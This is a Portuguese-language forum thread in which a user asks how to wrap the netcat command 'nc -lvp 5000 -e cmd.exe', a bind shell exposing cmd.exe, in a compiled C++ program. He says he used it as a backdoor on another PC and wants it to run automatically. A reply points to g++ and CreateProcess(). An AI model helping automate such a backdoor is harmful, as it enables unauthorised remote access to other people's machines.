Ir ao conteúdo

Posts recomendados

Postado

Bom dia de portugal, alguém me pode ajudar? Queria fazer um programa c++ para entrar na pasta onde o netcat está e escrever nc -lvp 5000 -e cmd.exe. Se souber queria transformar tambem o arquivo c++ num executavel é possível?

• Obrigado 1
Postado
1 hora atrás, Gabrielsilva123 disse:

Queria fazer um programa c++ para entrar na pasta onde o netcat está e escrever nc -lvp 5000 -e cmd.exe. Se souber queria transformar tambem o arquivo c++ num executavel é possível?

Que significa "entrar na pasta"?

transformar o C++ num executável é feito pelo compilador e pelo linker. muitas vezes de modo transparente como em g++ -o xxx.exe x.cpp que gera um executável a partir do código.

Se quer rodar o programa apenas basta chamar CreateProcess() e passar os parâmetros.

• Obrigado 1
Postado
3 horas atrás, Gabrielsilva123 disse:

Eu fiz com o netcat uma backdoor e tive acesso ao cmd do outro pc. Eu queria saber se é possível fazer isso automaticamente quando o codigo é executado

Então não se trata de entrar em pastas nem de escrever nela. Apenas automatizar uma sessão de seja lá o que fez e colocar dentro de um programa C++. Entenda que o sistema todo foi escrito em C, o cmd.exe e o netcat. Então... é possível.

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

• Criar novo...